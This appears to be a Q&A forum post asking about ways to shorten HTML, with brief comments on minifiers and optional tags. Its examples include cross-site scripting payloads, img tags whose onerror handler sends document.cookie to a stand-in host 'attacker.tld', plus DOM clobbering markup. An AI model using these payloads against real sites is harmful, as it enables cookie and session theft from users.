0

What possibilities do you have to shorten html?

Some things that come to my mind:

  • Removing html, head and body tags and it will be added

  • Removing whitespaces cf. this Stack Overflow question

  • Removing quotes

    <img src=x onerror=this.src='http://attacker.tld/?c='+document.cookie>

  • Let the browser perform corrections like

    fill in the protocol:

    <img src=x onerror=this.src='//attacker.tld/?c='+document.cookie>

  • and add missing tags:

    cat test.html     
<a id=CONFIG name=test><p><a href=//example.com? id=testPath name=protocol><p>T

    becomes (using Chromium 90):

enter image description here (cf Clobbering the clobbered - Advanced DOM Clobbering and DOM Clobbering)

How does the latter work?

Is there any good documentation on shortening possibilities somewhere?

secf00tprint
  • 553
  • 5
  • 15
  • 1
    So you want to hope that each browser implements these things all the same? Most likely they don't. Quotes, pretty standard, no protocol, um, that is protocol relative url, nothing ground breaking there. Now not closing tags, good luck on browsers implementing their rules to fix broken HTML the same. There are plenty of HTML minifiers out there, why not see what they are doing. – epascarello Aug 24 '21 at 15:56
  • HTML Minifier, ah nice, thx for the hint – secf00tprint Aug 24 '21 at 21:50
  • 1
    @epascarello — "Now not closing tags, good luck on browsers implementing their rules to fix broken HTML the same" — Omitting tags that HTML spec states (and has stated for decades) are optional doesn't depend on browsers implementing rules to fix *broken* HTML. – Quentin Aug 25 '21 at 09:59

0 Answers0